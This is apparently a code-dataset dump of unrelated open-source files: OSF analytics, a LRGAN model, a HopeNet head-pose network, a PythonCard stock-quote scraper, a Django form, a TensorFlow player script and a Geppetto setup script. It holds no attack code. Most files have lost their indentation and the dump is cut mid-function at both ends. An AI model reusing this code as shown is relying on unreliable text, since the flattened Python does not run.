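            first.append(n)
        elif n in (q1, q3):
            second.append(n)
        else:
            rest.append(n)
    return first, second, rest

# For example, sort_image_indexes_for_screening(7) returns ([3], [2, 5], [0, 1, 4, 6]):
# ImageFW 3 runs first, ImageFWs 2 and 5 run as its children, and the rest run last.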
|
certstream/__init__.py
|
costasko/certstream-python
| 331 |
101498
|
from .core import listen_for_events
|
scripts/analytics/file_summary.py
|
gaybro8777/osf.io
| 628 |
101499
|
import django
django.setup()
from django.contrib.contenttypes.models import ContentType
from django.db.models import Q
import logging
from dateutil.parser import parse
from datetime import datetime, timedelta
from django.utils import timezone
from osf.models import AbstractNode, Preprint
from website.app import init_app
from scripts.analytics.base import SummaryAnalytics
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
class FileSummary(SummaryAnalytics):
@property
def collection_name(self):
return 'file_summary'
def get_events(self, date):
super(FileSummary, self).get_events(date)
from addons.osfstorage.models import OsfStorageFile
# Convert to a datetime at midnight for queries and the timestamp
timestamp_datetime = datetime(date.year, date.month, date.day).replace(tzinfo=timezone.utc)
file_qs = OsfStorageFile.objects
abstract_node_content_type = ContentType.objects.get_for_model(AbstractNode)
preprint_content_type = ContentType.objects.get_for_model(Preprint)
public_query = Q(
target_object_id__in=AbstractNode.objects.filter(is_public=True).values('id'),
target_content_type__in=[abstract_node_content_type, preprint_content_type],
)
private_query = Q(
target_object_id__in=AbstractNode.objects.filter(is_public=False).values('id'),
target_content_type__in=[abstract_node_content_type, preprint_content_type],
)
daily_query = Q(created__gte=timestamp_datetime)
totals = {
'keen': {
'timestamp': timestamp_datetime.isoformat()
},
# OsfStorageFiles - the number of files on OsfStorage
'osfstorage_files_including_quickfiles': {
'total': file_qs.count(),
'public': file_qs.filter(public_query).count(),
'private': file_qs.filter(private_query).count(),
'total_daily': file_qs.filter(daily_query).count(),
'public_daily': file_qs.filter(public_query & daily_query).count(),
'private_daily': file_qs.filter(private_query & daily_query).count(),
},
}
logger.info(
'OsfStorage Files counted. Files: {}'.format(
totals['osfstorage_files_including_quickfiles']['total'],
)
)
return [totals]
def get_class():
return FileSummary
if __name__ == '__main__':
init_app()
file_summary = FileSummary()
args = file_summary.parse_args()
yesterday = args.yesterday
if yesterday:
date = (timezone.now() - timedelta(days=1)).date()
else:
date = parse(args.date).date() if args.date else None
events = file_summary.get_events(date)
file_summary.send_events(events)
|
vegans/models/unconditional/LRGAN.py
|
unit8co/vegans
| 459 |
101517
|
"""
LRGAN
-----
Implements the latent regressor GAN well described in the BicycleGAN paper[1].
It introduces an encoder network which maps the generator output back to the latent
input space. This should help to prevent mode collapse and improve image variety.
Losses:
- Generator: Binary cross-entropy + L1-latent-loss (Mean Absolute Error)
- Discriminator: Binary cross-entropy
- Encoder: L1-latent-loss (Mean Absolute Error)
Default optimizer:
- torch.optim.Adam
Custom parameter:
- lambda_z: Weight for the reconstruction loss for the latent z dimensions.
References
----------
.. [1] https://arxiv.org/pdf/1711.11586.pdf
"""
import torch
from torch.nn import L1Loss
from vegans.utils.networks import Generator, Adversary, Encoder
from vegans.models.unconditional.AbstractGANGAE import AbstractGANGAE
class LRGAN(AbstractGANGAE):
"""
Parameters
----------
generator: nn.Module
Generator architecture. Produces output in the real space.
adversary: nn.Module
Adversary architecture. Produces predictions for real and fake samples to differentiate them.
encoder: nn.Module
Encoder architecture. Produces predictions in the latent space.
x_dim : list, tuple
Number of the output dimensions of the generator and input dimension of the discriminator / critic.
In the case of images this will be [nr_channels, nr_height_pixels, nr_width_pixels].
z_dim : int, list, tuple
Number of the latent dimensions for the generator input. Might have dimensions of an image.
optim : dict or torch.optim
Optimizer used for each network. Could be either an optimizer from torch.optim or a dictionary with network
name keys and torch.optim as value, i.e. {"Generator": torch.optim.Adam}.
optim_kwargs : dict
Optimizer keyword arguments used for each network. Must be a dictionary with network
name keys and dictionary with keyword arguments as value, i.e. {"Generator": {"lr": 0.0001}}.
lambda_z: float
Weight for the reconstruction loss for the latent z dimensions.
adv_type: "Discriminator", "Critic" or "Autoencoder"
Indicating which adversarial architecture will be used.
feature_layer : torch.nn.*
Output layer used to compute the feature loss. Should be from either the discriminator or critic.
If `feature_layer` is not None, the original generator loss is replaced by a feature loss, introduced
[here](https://arxiv.org/abs/1606.03498v1).
fixed_noise_size : int
Number of images shown when logging. The fixed noise is used to produce the images in the folder/images
subdirectory, the tensorboard images tab and the samples in get_training_results().
device : string
Device used while training the model. Either "cpu" or "cuda".
ngpu : int
Number of gpus used during training if device == "cuda".
folder : string
Creates a folder in the current working directory with this name. All relevant files like summary, images, models and
tensorboard output are written there. Existing folders are never overwritten or deleted. If a folder with the same name
already exists a time stamp is appended to make it unique.
"""
#########################################################################
# Actions before training
#########################################################################
def __init__(
self,
generator,
adversary,
encoder,
x_dim,
z_dim,
optim=None,
optim_kwargs=None,
lambda_z=10,
adv_type="Discriminator",
feature_layer=None,
fixed_noise_size=32,
device=None,
ngpu=0,
folder="./veganModels/LRGAN",
secure=True):
super().__init__(
generator=generator, adversary=adversary, encoder=encoder,
x_dim=x_dim, z_dim=z_dim, optim=optim, optim_kwargs=optim_kwargs, adv_type=adv_type, feature_layer=feature_layer,
fixed_noise_size=fixed_noise_size, device=device, ngpu=ngpu, folder=folder, secure=secure
)
self.lambda_z = lambda_z
self.hyperparameters["lambda_z"] = lambda_z
if self.secure:
assert self.encoder.output_size == self.z_dim, (
"Encoder output shape must be equal to z_dim. {} vs. {}.".format(self.encoder.output_size, self.z_dim)
)
def _define_loss(self):
loss_functions = super()._define_loss()
loss_functions.update({"L1": L1Loss()})
return loss_functions
#########################################################################
# Actions during training
#########################################################################
def _calculate_generator_loss(self, X_batch, Z_batch, fake_images=None):
if fake_images is None:
fake_images = self.generate(z=Z_batch)
fake_Z = self.encode(x=fake_images)
if self.feature_layer is None:
fake_predictions = self.predict(x=fake_images)
gen_loss_original = self.loss_functions["Generator"](
fake_predictions, torch.ones_like(fake_predictions, requires_grad=False)
)
else:
gen_loss_original = self._calculate_feature_loss(X_real=X_batch, X_fake=fake_images)
latent_space_regression = self.loss_functions["L1"](
fake_Z, Z_batch
)
gen_loss = gen_loss_original + self.lambda_z*latent_space_regression
return {
"Generator": gen_loss,
"Generator_Original": gen_loss_original,
"Generator_L1": self.lambda_z*latent_space_regression
}
def _calculate_encoder_loss(self, X_batch, Z_batch, fake_images=None):
if fake_images is None:
fake_images = self.generate(z=Z_batch).detach()
fake_Z = self.encode(x=fake_images)
latent_space_regression = self.loss_functions["L1"](
fake_Z, Z_batch
)
return {
"Encoder": latent_space_regression
}
def _calculate_adversary_loss(self, X_batch, Z_batch, fake_images=None):
if fake_images is None:
fake_images = self.generate(z=Z_batch).detach()
fake_predictions = self.predict(x=fake_images)
real_predictions = self.predict(x=X_batch)
adv_loss_fake = self.loss_functions["Adversary"](
fake_predictions, torch.zeros_like(fake_predictions, requires_grad=False)
)
adv_loss_real = self.loss_functions["Adversary"](
real_predictions, torch.ones_like(real_predictions, requires_grad=False)
)
adv_loss = 0.5*(adv_loss_fake + adv_loss_real)
return {
"Adversary": adv_loss,
"Adversary_fake": adv_loss_fake,
"Adversary_real": adv_loss_real,
"RealFakeRatio": adv_loss_real / adv_loss_fake
}
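# A standalone sketch (plain PyTorch, independent of the vegans wrappers above) of the
# loss composition documented in the module docstring: the generator minimizes a binary
# cross-entropy term plus lambda_z times the L1 distance between the sampled latent codes
# and the codes the encoder recovers from the generated samples. The tensors below are
# stand-ins; the guard keeps the sketch inert on import.
if __name__ == "__main__":
    from torch.nn import BCELoss

    lambda_z = 10.0
    fake_predictions = torch.sigmoid(torch.randn(8, 1))   # stand-in discriminator outputs in (0, 1)
    Z_batch = torch.randn(8, 16)                          # sampled latent codes
    fake_Z = Z_batch + 0.1 * torch.randn(8, 16)           # stand-in encoder reconstruction of the codes

    gen_loss_original = BCELoss()(fake_predictions, torch.ones_like(fake_predictions))
    latent_space_regression = L1Loss()(fake_Z, Z_batch)
    gen_loss = gen_loss_original + lambda_z * latent_space_regression
    print(gen_loss_original.item(), latent_space_regression.item(), gen_loss.item())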
|
facexlib/headpose/hopenet_arch.py
|
spy14414/facexlib
| 164 |
101521
|
import torch
import torch.nn as nn
import torchvision
class HopeNet(nn.Module):
# Hopenet with 3 output layers for yaw, pitch and roll
# Predicts Euler angles by binning and regression with the expected value
def __init__(self, block, layers, num_bins):
super(HopeNet, self).__init__()
if block == 'resnet':
block = torchvision.models.resnet.Bottleneck
self.inplanes = 64
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3, bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
self.avgpool = nn.AvgPool2d(7)
self.fc_yaw = nn.Linear(512 * block.expansion, num_bins)
self.fc_pitch = nn.Linear(512 * block.expansion, num_bins)
self.fc_roll = nn.Linear(512 * block.expansion, num_bins)
self.idx_tensor = torch.arange(66).float()  # bin-center indices; assumes num_bins == 66 (3-degree bins covering [-99, 96])
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion, kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
@staticmethod
def softmax_temperature(tensor, temperature):
result = torch.exp(tensor / temperature)
result = torch.div(result, torch.sum(result, 1).unsqueeze(1).expand_as(result))
return result
def bin2degree(self, predict):
predict = self.softmax_temperature(predict, 1)
return torch.sum(predict * self.idx_tensor.type_as(predict), 1) * 3 - 99
def forward(self, x):
x = self.relu(self.bn1(self.conv1(x)))
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
pre_yaw = self.fc_yaw(x)
pre_pitch = self.fc_pitch(x)
pre_roll = self.fc_roll(x)
yaw = self.bin2degree(pre_yaw)
pitch = self.bin2degree(pre_pitch)
roll = self.bin2degree(pre_roll)
return yaw, pitch, roll
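# A standalone sketch of the bin-to-degree conversion used in bin2degree above: the 66
# softmax bins cover [-99, 96] degrees in 3-degree steps, and the predicted angle is the
# expected value of the bin index mapped back to degrees (index * 3 - 99). Guarded so it
# only runs when this file is executed directly.
if __name__ == "__main__":
    logits = torch.zeros(1, 66)
    logits[0, 33] = 10.0  # put almost all probability mass on bin 33
    probs = torch.softmax(logits, dim=1)
    idx = torch.arange(66).float()
    angle = torch.sum(probs * idx, dim=1) * 3 - 99
    print(angle)  # close to 33 * 3 - 99 = 0 degrees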
|
recipes/Python/535165_stock_market_check_v2/recipe-535165.py
|
tdiprima/code
| 2,023 |
101540
|
from threading import Thread
from time import sleep
from PythonCard import model
import urllib
import re
def get_quote(symbol):
global quote
base_url = 'http://finance.google.com/finance?q='
content = urllib.urlopen(base_url + symbol).read()
m = re.search('class="pr".*?>(.*?)<', content)
if m:
quote = m.group(1)
else:
quote = 'N/A'
return quote
def get_change(symbol):
global change
base_url = 'http://finance.google.com/finance?q='
content = urllib.urlopen(base_url + symbol).read()
m = re.search('class="chg".*?>(.*?)<', content)
if m:
change = m.group(1)
else:
change = 'N/A'
return change
def get_open(symbol):
global opens
base_url = 'http://finance.google.com/finance?q='
content = urllib.urlopen(base_url + symbol).read()
m = re.search('".*?op".*?>(.*?)<', content)
if m:
opens = m.group(1)
else:
opens = 'N/A'
return opens
def get_high(symbol):
global high
base_url = 'http://finance.google.com/finance?q='
content = urllib.urlopen(base_url + symbol).read()
m = re.search('".*?hi".*?>(.*?)<', content)
if m:
high = m.group(1)
else:
high = 'N/A'
return high
def get_high52(symbol):
global high52
base_url = 'http://finance.google.com/finance?q='
content = urllib.urlopen(base_url + symbol).read()
m = re.search('".*?hi52".*?>(.*?)<', content)
if m:
high52 = m.group(1)
else:
high52 = 'N/A'
return high52
def get_low(symbol):
global low
base_url = 'http://finance.google.com/finance?q='
content = urllib.urlopen(base_url + symbol).read()
m = re.search('".*?lo".*?>(.*?)<', content)
if m:
low = m.group(1)
else:
low = 'N/A'
return low
def get_vol(symbol):
global vol
base_url = 'http://finance.google.com/finance?q='
content = urllib.urlopen(base_url + symbol).read()
m = re.search('".*?vo".*?>(.*?)<', content)
if m:
vol = m.group(1)
else:
vol = 'N/A'
return vol
def get_mc(symbol):
global mc
base_url = 'http://finance.google.com/finance?q='
content = urllib.urlopen(base_url + symbol).read()
m = re.search('".*?mc".*?>(.*?)<', content)
if m:
mc = m.group(1)
else:
mc = 'N/A'
return mc
def get_lo52(symbol):
global lo52
base_url = 'http://finance.google.com/finance?q='
content = urllib.urlopen(base_url + symbol).read()
m = re.search('".*?lo52".*?>(.*?)<', content)
if m:
lo52 = m.group(1)
else:
lo52 = 'N/A'
return lo52
def get_pe(symbol):
global pe
base_url = 'http://finance.google.com/finance?q='
content = urllib.urlopen(base_url + symbol).read()
m = re.search('".*?pe".*?>(.*?)<', content)  # the recipe originally reused the "lo52" pattern here (a likely copy-paste slip); "pe" follows the naming of the other fields
if m:
pe = m.group(1)
else:
pe = 'N/A'
return pe
def get_beta(symbol):
global beta
base_url = 'http://finance.google.com/finance?q='
content = urllib.urlopen(base_url + symbol).read()
m = re.search('".*?beta".*?>(.*?)<', content)
if m:
beta = m.group(1)
else:
beta = 'N/A'
return beta
def get_div(symbol):
global div
base_url = 'http://finance.google.com/finance?q='
content = urllib.urlopen(base_url + symbol).read()
m = re.search('".*?div".*?>(.*?)<', content)
if m:
div = m.group(1)
else:
div = 'N/A'
return div
def get_yield(symbol):
global yield1
base_url = 'http://finance.google.com/finance?q='
content = urllib.urlopen(base_url + symbol).read()
m = re.search('".*?yield".*?>(.*?)<', content)
if m:
yield1 = m.group(1)
else:
yield1 = 'N/A'
return yield1
def get_shares(symbol):
global shares
base_url = 'http://finance.google.com/finance?q='
content = urllib.urlopen(base_url + symbol).read()
m = re.search('".*?shares".*?>(.*?)<', content)
if m:
shares = m.group(1)
else:
shares = 'N/A'
return shares
def get_own(symbol):
global own
base_url = 'http://finance.google.com/finance?q='
content = urllib.urlopen(base_url + symbol).read()
m = re.search('".*?own".*?>(.*?)<', content)
if m:
own = m.group(1)
else:
own = 'N/A'
return own
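# A sketch (not part of the original recipe): each get_* helper above downloads the quote
# page again, so one refresh costs a dozen HTTP requests. The same scraping pattern can
# reuse a single download for every field. The field markers ('pr', 'chg', 'op', ...) are
# the ones the helpers above already assume for the old Google Finance HTML.
def get_fields(symbol, classes=('pr', 'chg', 'op', 'hi', 'lo', 'vo', 'mc')):
    base_url = 'http://finance.google.com/finance?q='
    content = urllib.urlopen(base_url + symbol).read()
    results = {}
    for cls in classes:
        m = re.search('".*?%s".*?>(.*?)<' % cls, content)
        results[cls] = m.group(1) if m else 'N/A'
    return results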
class stock(model.Background):
def on_getQuote_mouseClick(self, event):
global symbol
symbol = self.components.quotese.text
class Repeater(Thread):
def __init__(self,interval,fun,*args,**kw):
Thread.__init__(self)
self.interval=interval
self.fun=fun
self.args=args
self.kw=kw
self.keep_going=True
def run(self):
while(self.keep_going):
sleep(self.interval)
self.fun(*self.args,**self.kw)
def Refresh(*a):
get_quote(symbol)
get_change(symbol)
self.components.current.text = quote
self.components.change.text = change
r=Repeater(1.0, Refresh)
r.start()
def on_stockinfo_mouseClick(self, event):
global symbol
symbol = self.components.quotese.text
get_open(symbol)
get_high(symbol)
get_high52(symbol)
get_low(symbol)
get_vol(symbol)
get_mc(symbol)
get_lo52(symbol)
get_pe(symbol)
get_beta(symbol)
get_div(symbol)
get_yield(symbol)
get_shares(symbol)
get_own(symbol)
self.components.inst.text = own
self.components.shares.text = shares
self.components.yield1.text = yield1
self.components.div.text = div
self.components.beta.text = beta
self.components.pe.text = pe
self.components.lo52.text = lo52
self.components.mkt.text = mc
self.components.vol.text = vol
self.components.opens.text = opens
self.components.high.text = high
self.components.hi52.text = high52
self.components.low.text = low
def on_save_mouseClick(self, event):
stock1 = open('stock1.txt', 'w')
stock1.write(self.components.stock1.text)
stock1.close()
stock2 = open('stock2.txt', 'w')
stock2.write(self.components.stock2.text)
stock2.close()
stock3 = open('stock3.txt', 'w')
stock3.write(self.components.stock3.text)
stock3.close()
stock4 = open('stock4.txt', 'w')
stock4.write(self.components.stock4.text)
stock4.close()
def on_load_mouseClick(self, event):
load1 = open('stock1.txt' , 'r').read()
self.components.stock1.text = load1
load2 = open('stock2.txt' , 'r').read()
self.components.stock2.text = load2
load3 = open('stock3.txt' , 'r').read()
self.components.stock3.text = load3
load4 = open('stock4.txt' , 'r').read()
self.components.stock4.text = load4
def on_update_mouseClick(self, event):
symbol = self.components.stock1.text
get_quote(symbol)
self.components.change1.text = quote
symbol = self.components.stock2.text
get_quote(symbol)
self.components.change2.text = quote
symbol = self.components.stock3.text
get_quote(symbol)
self.components.change3.text = quote
symbol = self.components.stock4.text
get_quote(symbol)
self.components.change4.text = quote
def on_clear_mouseClick(self, event):
self.components.stock1.text = ""
self.components.stock2.text = ""
self.components.stock3.text = ""
self.components.stock4.text = ""
self.components.change1.text = ""
self.components.change2.text = ""
self.components.change3.text = ""
self.components.change4.text = ""
if __name__ == '__main__':
app = model.Application(stock)
app.MainLoop()
# ------------------------------------------------------------------------------
# Save the following resource definition as stock.rsrc.py (PythonCard resource file).
{'application':{'type':'Application',
'name':'Template',
'backgrounds': [
{'type':'Background',
'name':'bgTemplate',
'title':'Standard Template with File->Exit menu',
'size':(711, 634),
'style':['resizeable'],
'menubar': {'type':'MenuBar',
'menus': [
{'type':'Menu',
'name':'menuFile',
'label':'&File',
'items': [
{'type':'MenuItem',
'name':'save',
'label':u'Save',
},
{'type':'MenuItem',
'name':'menuFileExit',
'label':'E&xit',
'command':'exit',
},
]
},
]
},
'components': [
{'type':'Button',
'name':'clear',
'position':(333, 555),
'label':u'Clear',
},
{'type':'Button',
'name':'save',
'position':(523, 444),
'size':(117, -1),
'label':u'Save',
},
{'type':'StaticText',
'name':'statictext10',
'position':(40, 510),
'font':{'faceName': u'Tahoma', 'family': 'sansSerif', 'size': 12},
'foregroundColor':(0, 0, 160, 255),
'text':u'Update to show price',
},
{'type':'Button',
'name':'load',
'position':(523, 420),
'size':(117, -1),
'label':u'Load',
},
{'type':'StaticText',
'name':'StaticText5',
'position':(26, 488),
'font':{'faceName': u'Tahoma', 'family': 'sansSerif', 'size': 12},
'foregroundColor':(0, 0, 160, 255),
'text':u'Or load to load previous',
},
{'type':'Button',
'name':'update',
'position':(522, 470),
'size':(120, 80),
'font':{'faceName': u'Tahoma', 'family': 'sansSerif', 'size': 11},
'label':u'Update',
},
{'type':'StaticText',
'name':'StaticText4',
'position':(31, 465),
'font':{'faceName': u'Tahoma', 'family': 'sansSerif', 'size': 12},
'foregroundColor':(0, 0, 160, 255),
'text':u'Then click save to save',
},
{'type':'StaticText',
'name':'StaticText3',
'position':(10, 445),
'font':{'faceName': u'Tahoma', 'family': 'sansSerif', 'size': 12},
'foregroundColor':(0, 0, 160, 255),
'text':u'Enter name of stocks to monitor',
},
{'type':'StaticBox',
'name':'StaticBox1',
'position':(343, 109),
'size':(349, 242),
},
{'type':'StaticLine',
'name':'StaticLine1',
'position':(2, 400),
'size':(697, -1),
'layout':'horizontal',
},
{'type':'StaticText',
'name':'StaticText2',
'position':(395, 414),
'text':u'Current Price',
},
{'type':'StaticText',
'name':'StaticText1',
'position':(268, 414),
'text':u'Name Of Stock',
},
{'type':'TextField',
'name':'change4',
'position':(378, 530),
'editable':False,
},
{'type':'TextField',
'name':'stock4',
'position':(258, 530),
},
{'type':'TextField',
'name':'change3',
'position':(378, 500),
'editable':False,
},
{'type':'TextField',
'name':'stock3',
'position':(258, 500),
},
{'type':'TextField',
'name':'change2',
'position':(378, 471),
'editable':False,
},
{'type':'TextField',
'name':'stock2',
'position':(258, 470),
},
{'type':'TextField',
'name':'change1',
'position':(378, 440),
'editable':False,
},
{'type':'TextField',
'name':'stock1',
'position':(258, 440),
},
{'type':'Button',
'name':'stockinfo',
'position':(170, 92),
'label':u'Get Info',
},
{'type':'HtmlWindow',
'name':'HtmlWindow1',
'position':(348, 120),
'size':(339, 225),
'backgroundColor':(255, 255, 255, 255),
'text':u'tickers.html',
},
{'type':'StaticText',
'name':'stockCheckversion',
'position':(213, 0),
'font':{'faceName': u'Tahoma', 'family': 'sansSerif', 'size': 36},
'foregroundColor':(255, 128, 0, 255),
'text':u'Stock Check V2.0',
},
{'type':'StaticText',
'name':'Changelbl',
'position':(14, 84),
'foregroundColor':(128, 0, 0, 255),
'text':u'Change',
},
{'type':'TextField',
'name':'change',
'position':(53, 74),
'size':(-1, 21),
'border':'none',
'editable':False,
'font':{'faceName': u'Tahoma', 'family': 'sansSerif', 'size': 10},
'foregroundColor':(128, 0, 0, 255),
},
{'type':'TextField',
'name':'current',
'position':(12, 33),
'size':(194, 33),
'border':'none',
'editable':False,
'font':{'faceName': u'Tahoma', 'family': 'sansSerif', 'size': 24},
'foregroundColor':(0, 128, 0, 255),
},
{'type':'StaticText',
'name':'Currentlbl',
'position':(81, 10),
'font':{'faceName': u'Tahoma', 'family': 'sansSerif', 'size': 18},
'foregroundColor':(0, 128, 0, 255),
'text':u'Current',
},
{'type':'StaticText',
'name':'wkLowlbl',
'position':(8, 364),
'text':u'52Wk Low',
},
{'type':'StaticText',
'name':'instOwnlbl',
'position':(183, 325),
'text':u'Inst. Own',
},
{'type':'StaticText',
'name':'Shareslbl',
'position':(186, 284),
'text':u'Shares',
},
{'type':'StaticText',
'name':'PElbl',
'position':(193, 124),
'text':u'P/E',
},
{'type':'StaticText',
'name':'Openlbl',
'position':(12, 124),
'text':u'Open',
},
{'type':'StaticText',
'name':'Highlbl',
'position':(16, 164),
'text':u'High',
},
{'type':'TextField',
'name':'pe',
'position':(260, 120),
'size':(81, -1),
'editable':False,
},
{'type':'TextField',
'name':'opens',
'position':(80, 120),
'size':(81, -1),
'editable':False,
},
{'type':'TextField',
'name':'high',
'position':(80, 160),
'size':(80, -1),
'editable':False,
},
{'type':'TextField',
'name':'inst',
'position':(260, 320),
'size':(81, -1),
'editable':False,
},
{'type':'TextField',
'name':'shares',
'position':(260, 280),
'size':(81, -1),
'editable':False,
},
{'type':'StaticText',
'name':'Yieldlbl',
'position':(191, 244),
'text':u'Yield',
},
{'type':'StaticText',
'name':'Dividendlbl',
'position':(183, 163),
'text':u'Dividend',
},
{'type':'TextField',
'name':'lo52',
'position':(80, 360),
'size':(81, -1),
'editable':False,
},
{'type':'TextField',
'name':'yield1',
'position':(260, 240),
'size':(81, -1),
'editable':False,
},
{'type':'TextField',
'name':'div',
'position':(260, 160),
'size':(81, -1),
'editable':False,
},
{'type':'StaticText',
'name':'Betalbl',
'position':(193, 204),
'text':u'Beta',
},
{'type':'TextField',
'name':'beta',
'position':(260, 200),
'size':(81, -1),
'editable':False,
},
{'type':'StaticText',
'name':'wkHighlbl',
'position':(6, 323),
'text':u'52Wk High',
},
{'type':'TextField',
'name':'hi52',
'position':(80, 320),
'size':(80, -1),
'editable':False,
},
{'type':'StaticText',
'name':'mktCaplbl',
'position':(11, 283),
'size':(-1, 16),
'text':u'Mkt Cap',
},
{'type':'TextField',
'name':'mkt',
'position':(80, 280),
'size':(80, -1),
'editable':False,
},
{'type':'StaticText',
'name':'Vollbl',
'position':(19, 244),
'text':u'Vol',
},
{'type':'StaticText',
'name':'Lowlbl',
'position':(16, 204),
'text':u'Low',
},
{'type':'TextField',
'name':'vol',
'position':(80, 240),
'size':(80, -1),
'editable':False,
},
{'type':'TextField',
'name':'low',
'position':(80, 200),
'size':(80, -1),
'editable':False,
},
{'type':'Button',
'name':'getQuote',
'position':(313, 63),
'label':u'Get Quote',
},
{'type':'TextField',
'name':'quotese',
'position':(209, 64),
},
] # end components
} # end background
] # end backgrounds
} }
|
th_evernote/forms.py
|
Leopere/django-th
| 1,069 |
101553
|
# coding: utf-8
from django import forms
from django.forms import TextInput
from th_evernote.models import Evernote
class EvernoteForm(forms.ModelForm):
"""
Form to handle the Evernote service
"""
class Meta:
model = Evernote
fields = ('tag', 'notebook', )
widgets = {
'tag': TextInput(attrs={'class': 'form-control'}),
'notebook': TextInput(attrs={'class': 'form-control'}),
}
class EvernoteConsumerForm(EvernoteForm):
pass
class EvernoteProviderForm(EvernoteForm):
pass
|
demo/play_with_saved_model.py
|
simonoso/EasyRL
| 125 |
101588
|
import gym
import numpy as np
import tensorflow as tf
from tensorflow import saved_model as sm
from easy_rl.utils.window_stat import WindowStat
from easy_rl.utils.gym_wrapper.atari_wrapper import make_atari, wrap_deepmind
import time
def main():
gym_env = gym.make("CartPole-v0")
atari_env = make_atari("PongNoFrameskip-v4")
atari_env = wrap_deepmind(
env=atari_env,
frame_stack=True,
clip_rewards=False,
episode_life=True,
wrap_frame=True,
frame_resize=42)
# replace the following env according to your saved_model
# env = atari_env
env = gym_env
with tf.Session() as sess:
path = 'dump_dir'
MetaGraphDef = tf.saved_model.loader.load(
sess, tags=[sm.tag_constants.SERVING], export_dir=path)
# get SignatureDef protobuf
SignatureDef_d = MetaGraphDef.signature_def
SignatureDef = SignatureDef_d["predict_results"]
# get inputs/outputs TensorInfo protobuf
ph_inputs = {}
for name, ts_info in SignatureDef.inputs.items():
ph_inputs[name] = sm.utils.get_tensor_from_tensor_info(
ts_info, sess.graph)
outputs = {}
for name, ts_info in SignatureDef.outputs.items():
outputs[name] = sm.utils.get_tensor_from_tensor_info(
ts_info, sess.graph)
for name, ph in ph_inputs.items():
print(name, ph)
for name, ts in outputs.items():
print(name, ts)
len_window = WindowStat("length", 50)
reward_window = WindowStat("reward", 50)
for i in range(100):
ob = env.reset()
env.render()
time.sleep(0.2)
done = False
episode_len = 0
episode_reward = .0
while not done:
action = sess.run(
outputs["output_actions"],
feed_dict={
ph_inputs["obs_ph"]: [np.asarray(ob)],
ph_inputs["deterministic_ph"]: True
})
next_ob, reward, done, info = env.step(action[0])
env.render()
time.sleep(0.1)
episode_reward += reward
episode_len += 1
ob = next_ob
len_window.push(episode_len)
reward_window.push(episode_reward)
print(reward_window)
print(len_window)
if __name__ == '__main__':
main()
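# Tip (assumes a standard TensorFlow 1.x installation, matching the tf.Session usage
# above): the signature names and tensor keys inside `dump_dir` can also be inspected
# from the shell with
#     saved_model_cli show --dir dump_dir --all
# which prints the same inputs/outputs enumerated by the loops above.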
|
utilities/source_setup/setup.py
|
sanjayankur31/org.geppetto
| 164 |
101595
|
#!/usr/bin/python
#
# Script to clone Geppetto git repositories
# If a target directory is not passed as the
# first argument, the sourcesdir specified in
# config.json is used
# If config.json is used, org.geppetto.core,
# model, frontend and simulation are
# included automatically.
# The user can choose to select the rest of the repos
# or automatically include those listed in config.json
#
import os, sys, subprocess, json
try:
import simplejson
except:
import json as simplejson
from subprocess import call
from xml.dom.minidom import parse, parseString
print(open(os.path.join(os.path.dirname(__file__), 'config.json')).read())
config = json.loads(open(os.path.join(os.path.dirname(__file__), 'config.json')).read())
def writeToPomXML(repo):
#Open pom.xml
basepath = os.path.dirname(__file__)
pompath = os.path.abspath(os.path.join(basepath, "..", "..", "pom.xml"))
#Create minidom parser
pom = parse(pompath)
#Get elements tagged module - we will need to add to these later.
modules = pom.getElementsByTagName("modules").item(0)
all_modules = pom.getElementsByTagName("modules")
module = pom.getElementsByTagName("module")
#Start from the assumption that we need to write the repo to our xml file. Check pom.xml to see if the repo is present.
# If it is not, add a new element in there with the repo name.
write_repo = False
for node in all_modules:
module_list=node.getElementsByTagName('module')
for m in module_list:
if m.childNodes[0].nodeValue == "../"+repo['name']:
write_repo=True
print(m.childNodes[0].nodeValue)
if write_repo == False:
new_module = pom.createElement("module")
new_module.nodeValue="../"+repo['name']
txt=pom.createTextNode("../"+repo['name'])
new_module.appendChild(txt)
modules.appendChild(new_module)
newline = pom.createTextNode('\n')
modules.appendChild(newline)
pom.writexml(open(pompath,"w"),
indent=" ",
addindent=" ",
newl='')
def writeToPlan(repo):
#Open geppetto.plan
basepath = os.path.dirname(__file__)
planpath = os.path.abspath(os.path.join(basepath, "..", "..", "geppetto.plan"))
#Create minidom parser
plan = parse(planpath)
#Get elements tagged plan and artifact.
plan_name = plan.getElementsByTagName("plan").item(0)
artifact_type = plan.getElementsByTagName("artifact")
#Start from the assumption that we need to write the repo to our xml file. Check pom.xml to see if the repo is present.
#If it is not, add a new element in there with the repo name, bundle type and the repo version.
write_artifact=False
artifact_version = artifact_type[0].attributes["version"].value
for x in range(0, len(artifact_type)):
art_ref = artifact_type[x]
if art_ref.attributes["name"].value == repo['name']:
write_artifact=True
if write_artifact == False:
new_artifact = plan.createElement("artifact")
new_artifact.setAttribute("type", "bundle")
new_artifact.setAttribute("name", repo["name"])
new_artifact.setAttribute("version", artifact_version)
plan_name.appendChild(new_artifact)
plan.writexml(open(planpath,"w"),
indent=" ",
addindent=" ",
newl='\n')
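# A self-contained sketch (illustrative only) of the duplicate-check-then-append pattern
# used by writeToPomXML above, run against a tiny in-memory pom instead of the real file.
def _demo_add_module(repo_name):
    from xml.dom.minidom import parseString
    pom = parseString("<project><modules>"
                      "<module>../org.geppetto.core</module>"
                      "</modules></project>")
    modules = pom.getElementsByTagName("modules").item(0)
    existing = [m.childNodes[0].nodeValue for m in modules.getElementsByTagName("module")]
    if "../" + repo_name not in existing:
        new_module = pom.createElement("module")
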